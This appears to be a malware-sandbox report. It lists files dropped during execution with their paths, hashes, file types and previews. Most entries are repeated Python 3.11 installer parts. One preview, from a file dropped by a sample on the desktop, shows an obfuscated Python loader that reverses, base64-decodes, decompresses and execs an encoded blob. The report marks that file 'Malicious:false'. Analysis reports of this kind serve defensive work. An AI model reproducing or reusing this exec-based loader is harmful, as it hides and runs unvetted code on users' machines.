                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".P.y.t.h.o.n. .3...1.1...0. .(.6.4.-.b.i.t.).". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.7.f.8.3.8.1.a.d.-.2.e.4.2.-.4.4.3.2.-.8.d.e.5.-.c.7.b.e.e.b.e.1.0.0.9.f.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.7.6.7.B.3.1.E.B.-.0.1.0.6.-.5.A.E.3.-.B.4.6.E.-.7.7.F.3.2.D.1.B.A.B.A.2.}.". .P.e.r.M.a.c.h.i.n.e.=.".n.o.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.F.e.a.t.u.r.e.I.n.f.o. .P.a.c.k.a.g.e.=.".e.x.e._.A.l.l.U.s.e.r.s.". .F.e.a.t.u.r.e.=.".D.e.f.a.u.l.t.F.e.a.t.u.r.e.". .S.i.z.e.=.".2.0.4.9.0.2.6.". .P.a.r.e.n.t.=.".". .T.i.t.l.e.=.".P.y.t.h.o.n. .3...1.1...0. .E.x.e.c.u.t.a.b.l.e.
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12050
                                                                                                                                Entropy (8bit):5.202199468357687
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0cUc9Oa2cacjcPnfEUcUr80Mpcu5cmc0pc3:0cUcAa2cacjcPfFcUx4cu5cmcQc3
                                                                                                                                MD5:4A006BB0FD949404E628D26F833C994B
                                                                                                                                SHA1:128BF94B6232C1591EE9D9D4B15953368838D8EF
                                                                                                                                SHA-256:BE2BAED45BCFB013E914E9D5BF6BC7C77A311F6F1723AFBB7EB1FAA7DA497E1B
                                                                                                                                SHA-512:B77383479E630060AEAACBB59E4F90AA0DB3037C9C37EBF668CF6669F48B9F57602210C8E0C20B92A20D1BAE1A371A98997B35F48082456F77964C7978664CD4
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="670" Height="412" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-14" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="1" Height="-26" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="2" Height="-24" Weight="500" Foreground="808080" Background="ffffff">Segoe UI</Font>.. <Font Id="3" Height="-14" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="4" Height="-14" Weight="500" Foreground="ff0000" Background="ffffff" Underline="yes">Segoe UI</Font>.. <Font Id="5" Height="-14" Weight="500" Foreground="808080" Background="ffffff">Segoe UI</Font>.... <Page Name="Help">.. <Text X="185" Y="11" Width="-11" Height="36" FontId="1" DisablePrefix="yes">#(loc.HelpHeader)</Text>.. <Image X="0" Y="0" Width="178" Height="382" Ima
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (349), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9157
                                                                                                                                Entropy (8bit):5.08118087878034
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:JTqB3tcIyDykuiM7iIbY8gQOOeupqplqe7o7qiYici+iDF8zcz6/DuukOVZbRU8q:k5J+nSuUBBr+N/K
                                                                                                                                MD5:3599F10F43292724DCBFF9064172DA70
                                                                                                                                SHA1:B6E041707A22B8DE41B1E100A3DD94900D023BAA
                                                                                                                                SHA-256:24445135B97FCF8CEC3DD1CC96DD0965627EC2C214F2AF67D6E1344F791CD774
                                                                                                                                SHA-512:26A9A1F58C6F613EFD88A8178D2A059BF0EE1B67EFDEB8978DCA0100F98103A73BCE9724E0DABA718C921BCE5A56E5179133067C5EA6149442F6CF2D14CAA3C6
                                                                                                                                Malicious:false
                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<WixLocalization Culture="en-us" Language="1033" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Installing">Installing</String>.. <String Id="Installation">Setup</String>.. <String Id="Modifying">Updating</String>.. <String Id="Modification">Modify</String>.. <String Id="Repairing">Repairing</String>.. <String Id="Repair">Repair</String>.. <String Id="Uninstalling">Removing</String>.. <String Id="Uninstallation">Uninstall</String>.. .. <String Id="ElevateForCRTInstall">You will be prompted for Administrator privileges to install a C Runtime Library update (KB2999226).......Continue?</String>.. .. <String Id="CancelButton">&amp;Cancel</String>.. <String Id="CloseButton">&amp;Close</String>.. <String Id="InstallHeader">Install [WixBundleName]</String>.. <String Id="InstallMessage">Select Install Now to install Python with default settings, or choose
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):687616
                                                                                                                                Entropy (8bit):5.996424966093035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:E4vBxEOzrbCgUtcfItqnuzOL48h1d5G1duqIYcUuaez4RkXWrp:PBxlrmcwtquX/duqIwdqmrp
                                                                                                                                MD5:5D8FA952950469A8904E4F68AC193699
                                                                                                                                SHA1:CE9F68FB9601B9A5B95FC93C88A3A22ED42AFA3D
                                                                                                                                SHA-256:CA7527124A97079C229332867BD27FEDE3EB263A52639B4BDAF39ED47E604E57
                                                                                                                                SHA-512:58C43A813FF9F5BEBE2928E68B7F28F999922248CCC6E8CF6CE5F14BAF6AA42B9B8E59FE9B638C5376E7E4E86FE21EAE185FD51328B7B000BBE6903794E161B4
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........<...R...R...R...Q...R...W.P.R.[.V...R.[.Q...R.[.W...R...V...R...T...R.~.W...R...S...R...S.$.R.U.W...R.U.R...R.U.....R.U.P...R.Rich..R.........................PE..L.....Vc...........!...!.d..........,C....................................................@.........................0........V..........<........................7..`...8...........................x...@............P...............................text....c.......d.................. ..`.rdata..G............h..............@..@.data...x*... ......................@....idata..:$...P...&..................@..@.00cfg...............4..............@..@.rsrc...<............6..............@..@.reloc..t@.......B...<..............@..B........................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:PNG image data, 176 x 382, 8-bit/color RGB, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51948
                                                                                                                                Entropy (8bit):7.980841800703768
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:/c/aRsg1fYfJt0Bg74nWPMMCNBaeQzxxj8ckBo:UcsgGfP0yCWTAaeyxxjGBo
                                                                                                                                MD5:888EB713A0095756252058C9727E088A
                                                                                                                                SHA1:C14F69F2BEF6BC3E2162B4DD78E9DF702D94CDB4
                                                                                                                                SHA-256:79434BD1368F47F08ACF6DB66638531D386BF15166D78D9BFEA4DA164C079067
                                                                                                                                SHA-512:7C59F4ADA242B19C2299B6789A65A1F34565FED78730C22C904DB16A9872FE6A07035C6D46A64EE94501FBCD96DE586A8A5303CA22F33DA357D455C014820CA0
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR.......~......@.y....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...........k.....IDATx...Y.e.v...f....YY.k....CC. H..I..E..M....)K.j".......p8...P.!...*dZ.l.![.M.`c..................ZsN.......YY.2.U>......{..s.5.c....g.H..WD....Q.........*......#.(1{..%f..""..Z...=..w...=*.......{...{..].~kN)1...*1..W..W.=...K.".n.{w.....Ad..,D.......1;.....b.011....QNBV#B..#...(.^...._=.B..9..;..~.ZVh....L..L,D.A...A.A.D.=. ...X.Y...U. %V..A...I@.+....DDAD.l..L..D..A.."D.A.L...9.(..#"...@....1.o.V..L.....Af&D8..M.._...AA.ND-.033.Qx.;....[......=.....) ....<.-.cb...,..A.......f<....DP.G.H...EA$.?..G...c....,".A..L..=H.X...3.F.y...G.&.....*...np;.=3S....b..w"bFL.G..[.A......A....M.Q.3.J.e.Pj.."|..fF.I.E^..H.h...|.x.....3...0.P..^.'A;(...P=::Of...../D..PpcF...."'W=........._...g..2..k.. ".].@?..k....c.7#$<..a.../.l.BAn...|....#.....l .VU..]g/..<T..u..N,.A...n.*h.d..A..BF.I.U....AA...(..D.nQ...&z("..Dn.,LT.
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (675), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):101308
                                                                                                                                Entropy (8bit):3.7248729769473004
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:XzPIgTPT/s2iA9JI4kzlgfTlQCQZ01s56H7OCGVfXzRz2mUF7J7PG2km/MqIAcdF:XzPIrlklBY5
                                                                                                                                MD5:37D5E3E690BF0E58DB9873516812599D
                                                                                                                                SHA1:9E6D1E4CD46EEFCD2B585EB1A450231817D251F9
                                                                                                                                SHA-256:4C694653B483F1024371A058EFF0022F9E850ABCB3771F9083BF002C48A7506D
                                                                                                                                SHA-512:3418D3A63874169527453D405CF5559382036FCB5C67A67D2473F20BD99CD706537F00AD7932E026CA8D21999AB6A7153D2C6567BDB4653A35682D93F3070949
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".P.y.t.h.o.n. .3...1.1...0. .(.6.4.-.b.i.t.).". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.7.f.8.3.8.1.a.d.-.2.e.4.2.-.4.4.3.2.-.8.d.e.5.-.c.7.b.e.e.b.e.1.0.0.9.f.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.7.6.7.B.3.1.E.B.-.0.1.0.6.-.5.A.E.3.-.B.4.6.E.-.7.7.F.3.2.D.1.B.A.B.A.2.}.". .P.e.r.M.a.c.h.i.n.e.=.".n.o.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.F.e.a.t.u.r.e.I.n.f.o. .P.a.c.k.a.g.e.=.".e.x.e._.A.l.l.U.s.e.r.s.". .F.e.a.t.u.r.e.=.".D.e.f.a.u.l.t.F.e.a.t.u.r.e.". .S.i.z.e.=.".2.0.4.9.0.2.6.". .P.a.r.e.n.t.=.".". .T.i.t.l.e.=.".P.y.t.h.o.n. .3...1.1...0. .E.x.e.c.u.t.a.b.l.e.
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12050
                                                                                                                                Entropy (8bit):5.202199468357687
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0cUc9Oa2cacjcPnfEUcUr80Mpcu5cmc0pc3:0cUcAa2cacjcPfFcUx4cu5cmcQc3
                                                                                                                                MD5:4A006BB0FD949404E628D26F833C994B
                                                                                                                                SHA1:128BF94B6232C1591EE9D9D4B15953368838D8EF
                                                                                                                                SHA-256:BE2BAED45BCFB013E914E9D5BF6BC7C77A311F6F1723AFBB7EB1FAA7DA497E1B
                                                                                                                                SHA-512:B77383479E630060AEAACBB59E4F90AA0DB3037C9C37EBF668CF6669F48B9F57602210C8E0C20B92A20D1BAE1A371A98997B35F48082456F77964C7978664CD4
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="670" Height="412" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-14" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="1" Height="-26" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="2" Height="-24" Weight="500" Foreground="808080" Background="ffffff">Segoe UI</Font>.. <Font Id="3" Height="-14" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="4" Height="-14" Weight="500" Foreground="ff0000" Background="ffffff" Underline="yes">Segoe UI</Font>.. <Font Id="5" Height="-14" Weight="500" Foreground="808080" Background="ffffff">Segoe UI</Font>.... <Page Name="Help">.. <Text X="185" Y="11" Width="-11" Height="36" FontId="1" DisablePrefix="yes">#(loc.HelpHeader)</Text>.. <Image X="0" Y="0" Width="178" Height="382" Ima
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (349), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9157
                                                                                                                                Entropy (8bit):5.08118087878034
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:JTqB3tcIyDykuiM7iIbY8gQOOeupqplqe7o7qiYici+iDF8zcz6/DuukOVZbRU8q:k5J+nSuUBBr+N/K
                                                                                                                                MD5:3599F10F43292724DCBFF9064172DA70
                                                                                                                                SHA1:B6E041707A22B8DE41B1E100A3DD94900D023BAA
                                                                                                                                SHA-256:24445135B97FCF8CEC3DD1CC96DD0965627EC2C214F2AF67D6E1344F791CD774
                                                                                                                                SHA-512:26A9A1F58C6F613EFD88A8178D2A059BF0EE1B67EFDEB8978DCA0100F98103A73BCE9724E0DABA718C921BCE5A56E5179133067C5EA6149442F6CF2D14CAA3C6
                                                                                                                                Malicious:false
                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<WixLocalization Culture="en-us" Language="1033" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Installing">Installing</String>.. <String Id="Installation">Setup</String>.. <String Id="Modifying">Updating</String>.. <String Id="Modification">Modify</String>.. <String Id="Repairing">Repairing</String>.. <String Id="Repair">Repair</String>.. <String Id="Uninstalling">Removing</String>.. <String Id="Uninstallation">Uninstall</String>.. .. <String Id="ElevateForCRTInstall">You will be prompted for Administrator privileges to install a C Runtime Library update (KB2999226).......Continue?</String>.. .. <String Id="CancelButton">&amp;Cancel</String>.. <String Id="CloseButton">&amp;Close</String>.. <String Id="InstallHeader">Install [WixBundleName]</String>.. <String Id="InstallMessage">Select Install Now to install Python with default settings, or choose
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):687616
                                                                                                                                Entropy (8bit):5.996424966093035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:E4vBxEOzrbCgUtcfItqnuzOL48h1d5G1duqIYcUuaez4RkXWrp:PBxlrmcwtquX/duqIwdqmrp
                                                                                                                                MD5:5D8FA952950469A8904E4F68AC193699
                                                                                                                                SHA1:CE9F68FB9601B9A5B95FC93C88A3A22ED42AFA3D
                                                                                                                                SHA-256:CA7527124A97079C229332867BD27FEDE3EB263A52639B4BDAF39ED47E604E57
                                                                                                                                SHA-512:58C43A813FF9F5BEBE2928E68B7F28F999922248CCC6E8CF6CE5F14BAF6AA42B9B8E59FE9B638C5376E7E4E86FE21EAE185FD51328B7B000BBE6903794E161B4
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........<...R...R...R...Q...R...W.P.R.[.V...R.[.Q...R.[.W...R...V...R...T...R.~.W...R...S...R...S.$.R.U.W...R.U.R...R.U.....R.U.P...R.Rich..R.........................PE..L.....Vc...........!...!.d..........,C....................................................@.........................0........V..........<........................7..`...8...........................x...@............P...............................text....c.......d.................. ..`.rdata..G............h..............@..@.data...x*... ......................@....idata..:$...P...&..................@..@.00cfg...............4..............@..@.rsrc...<............6..............@..@.reloc..t@.......B...<..............@..B........................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                File Type:PNG image data, 176 x 382, 8-bit/color RGB, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51948
                                                                                                                                Entropy (8bit):7.980841800703768
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:/c/aRsg1fYfJt0Bg74nWPMMCNBaeQzxxj8ckBo:UcsgGfP0yCWTAaeyxxjGBo
                                                                                                                                MD5:888EB713A0095756252058C9727E088A
                                                                                                                                SHA1:C14F69F2BEF6BC3E2162B4DD78E9DF702D94CDB4
                                                                                                                                SHA-256:79434BD1368F47F08ACF6DB66638531D386BF15166D78D9BFEA4DA164C079067
                                                                                                                                SHA-512:7C59F4ADA242B19C2299B6789A65A1F34565FED78730C22C904DB16A9872FE6A07035C6D46A64EE94501FBCD96DE586A8A5303CA22F33DA357D455C014820CA0
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR.......~......@.y....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...........k.....IDATx...Y.e.v...f....YY.k....CC. H..I..E..M....)K.j".......p8...P.!...*dZ.l.![.M.`c..................ZsN.......YY.2.U>......{..s.5.c....g.H..WD....Q.........*......#.(1{..%f..""..Z...=..w...=*.......{...{..].~kN)1...*1..W..W.=...K.".n.{w.....Ad..,D.......1;.....b.011....QNBV#B..#...(.^...._=.B..9..;..~.ZVh....L..L,D.A...A.A.D.=. ...X.Y...U. %V..A...I@.+....DDAD.l..L..D..A.."D.A.L...9.(..#"...@....1.o.V..L.....Af&D8..M.._...AA.ND-.033.Qx.;....[......=.....) ....<.-.cb...,..A.......f<....DP.G.H...EA$.?..G...c....,".A..L..=H.X...3.F.y...G.&.....*...np;.=3S....b..w"bFL.G..[.A......A....M.Q.3.J.e.Pj.."|..fF.I.E^..H.h...|.x.....3...0.P..^.'A;(...P=::Of...../D..PpcF...."'W=........._...g..2..k.. ".].@?..k....c.7#$<..a.../.l.BAn...|....#.....l .VU..]g/..<T..u..N,.A...n.*h.d..A..BF.I.U....AA...(..D.nQ...&z("..Dn.,LT.
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:ASCII text, with very long lines (65534), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):123190
                                                                                                                                Entropy (8bit):6.003854815244625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:n6rJUtcXsz4/CQAHF/Q5plv+pARxHO9cY0AnbmF+gT3:6rJUWXsE/TAl+lv++R8zbm1T3
                                                                                                                                MD5:B6C018FE34A5A3EF54CB5896F6F0DBD8
                                                                                                                                SHA1:AC470F512B65FFE4561DDFCA73A52A4F684AF3F5
                                                                                                                                SHA-256:74807334F6A5E95A83DD7AE87FACFBCB82E18CEFCF86DED3085D5AA3A553EB66
                                                                                                                                SHA-512:9A46EC96104DB2A73007B3737B70ED77BAC41CB95E765F02305D9826AD7A2E5BF163008B810FD5F621CAA4BEC6C68CF799D7C0B420272DAC9CA74206840A9A4E
                                                                                                                                Malicious:false
                                                                                                                                Preview:.._ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'=8dEol8fvf/++nyS82hYe6aCcXX/jMaWZ53qT7KlzzdTrkbYxTEH0N4P9kp2OV0EOF7f0vz3CigJCgAA/CAGKzGeaQjVZV+9Wu2g4wUwy47ej6n/IQAAk8IWC4iHKX18Ts3B3yhg2thAB7wLlNcJkHewRWsfpf8zPQjr5r1zE2YLgKhyBCxvas2kLyvxlsLvZr1lQM0K2pNcQlBT8MqYn8X3IiESqS2iHGOnMgQdqW4HK9x1DNwxCemnoic7wc19Dw5ivh9GfZlEdNTYTmvqMKe690FrDpWlA7b2Ij3SCvvn3eSv0aE7AIYnQo1jdGx9CjN3HD9SA9OngrzlLTTbLZt8Qi1y8/i4/mpfs/WBU2emCbh1hpw8qrf0G98Fs5upGvK9qE3TTk1n8Rdab7O4oF60zTy10SLQdf1+7tR9yAppxrOSIBzQgfQn6wo5OfZOZ/w80kpgoc0ejA7OPplH2+YvD2ReVAmx8zP8d9tvpuR3eJCvZil9AzyOYlLNGzK+w2/41/Dcn2x53HXxPNHat2WF6i39fKZsIJmERK5HXkiYpP+LvPrV4CDKGaN1BldD+zvff6ta/10UwNSin6EhJZpaCYaOtk2eLDuR+8xPjkkrhkyoLPZ2iS4MPM5rWrSlIgelgMfJuDSR/+IjMoJOYowvvKA158xbZE2AnhdIWb4iHN5RBBYQJGqVLme1s8hC8ycy/3pAA/gyhZoEFE+CSE4bpbe4TI2xpUC1OT1idz9h1ERtlR6cyOFgA2v1u4eJfrjCK1Y4LNYrgh+ckovlmPNcgIfGcVIiQwdW13RZnxY7APBqwe2GqijXZ/JqwxCKhHJjBvs+ZkPXLwcLVIj88hSVHTIoiGevIH2gUAUwjk8dtM40caYSYYQsiPGpAz3v/8b
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Development Libraries (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Development Libraries (64-bit)., Template: x64;1033, Revision Number: {AF6ECF7A-D3A2-441F-B4A6-63C4AE3F5B27}, Create Time/Date: Mon Oct 24 19:41:04 2022, Last Saved Time/Date: Mon Oct 24 19:41:04 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):335872
                                                                                                                                Entropy (8bit):7.6879454389944035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:KOPj2XBoyr8aLvyMcL/y8amyhAFJmiIdZXVVF8AkhA1ZqHGKQOf6HOMTtXsUl3+5:3j2XKqvHcGmyh0GdZlVFgpGw7gmo
                                                                                                                                MD5:870B3398F72BBD9614A11355594AD9AF
                                                                                                                                SHA1:40E9AF2E83D56635FD67577B9B07F9402695CFE9
                                                                                                                                SHA-256:107D8478A7E59EE1E662FF883D4DAB18A80A426B5C1502DD9CBA9ED5F25E74A2
                                                                                                                                SHA-512:97F39D09DCD93B9427AC9560128BCD6B870F8D79448E2FAF0CFA3E5909B0E6114AC00987B97120B33E970F6A97C1E37007B370AFE3F81AEBE4FD9A96A2E25EEF
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Standard Library (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Standard Library (64-bit)., Template: x64;1033, Revision Number: {8EB245CF-F1C9-4244-B9FB-C59D3B1249D7}, Create Time/Date: Mon Oct 24 19:41:44 2022, Last Saved Time/Date: Mon Oct 24 19:41:44 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8450048
                                                                                                                                Entropy (8bit):7.993478334875522
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:196608:JN0JP1ks3CHBFKsNeofEBtgIHHXaN8Na/PgxxWIRzxcQHGs:El1ks3czKsgvgkKNWa3g9zcgGs
                                                                                                                                MD5:6D384D6CF94D1C6A61EAE5B55BF99752
                                                                                                                                SHA1:DD78FB4D8C9B9AF8C03C541EFCCE21E7F908F22D
                                                                                                                                SHA-256:A722136B6A7042D30DA15D2C5B3ADA1B11FAC74F29BC83B754179F7899727C47
                                                                                                                                SHA-512:6E5AF02F78A831C3BA83D6007347272EF076B3FB198DEFBF42A7AC51BE0739E63E874173DC7207A679A0E3187D7EAEEE94DEB4017520ACF2AF50C8B0946466A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Standard Library (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Standard Library (64-bit)., Template: x64;1033, Revision Number: {8EB245CF-F1C9-4244-B9FB-C59D3B1249D7}, Create Time/Date: Mon Oct 24 19:41:44 2022, Last Saved Time/Date: Mon Oct 24 19:41:44 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8450048
                                                                                                                                Entropy (8bit):7.993478334875522
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:196608:JN0JP1ks3CHBFKsNeofEBtgIHHXaN8Na/PgxxWIRzxcQHGs:El1ks3czKsgvgkKNWa3g9zcgGs
                                                                                                                                MD5:6D384D6CF94D1C6A61EAE5B55BF99752
                                                                                                                                SHA1:DD78FB4D8C9B9AF8C03C541EFCCE21E7F908F22D
                                                                                                                                SHA-256:A722136B6A7042D30DA15D2C5B3ADA1B11FAC74F29BC83B754179F7899727C47
                                                                                                                                SHA-512:6E5AF02F78A831C3BA83D6007347272EF076B3FB198DEFBF42A7AC51BE0739E63E874173DC7207A679A0E3187D7EAEEE94DEB4017520ACF2AF50C8B0946466A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Documentation (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Documentation (64-bit)., Template: x64;1033, Revision Number: {44288BEF-ED6A-4B77-ACD7-9FF4C8E9415D}, Create Time/Date: Mon Oct 24 19:41:10 2022, Last Saved Time/Date: Mon Oct 24 19:41:10 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5197824
                                                                                                                                Entropy (8bit):7.987872164430188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:ujPgdGs1Bx3jnmD+skvRhE12quVmVFmirGyzJZoqofdxBBZL02XmEhvc:uEdG2BxTnmQRhxUVnrGeSqWdxxL02/E
                                                                                                                                MD5:5315DCA2E662D1A7EB13BD41F93ABC67
                                                                                                                                SHA1:2A1FA39419E7F757ACEAA1FC05A0F811E791AEEC
                                                                                                                                SHA-256:6B4B9DACB83F2093D473B3ABA9BA783FD17E63D46BC9631FE4B2A88348BA7F5A
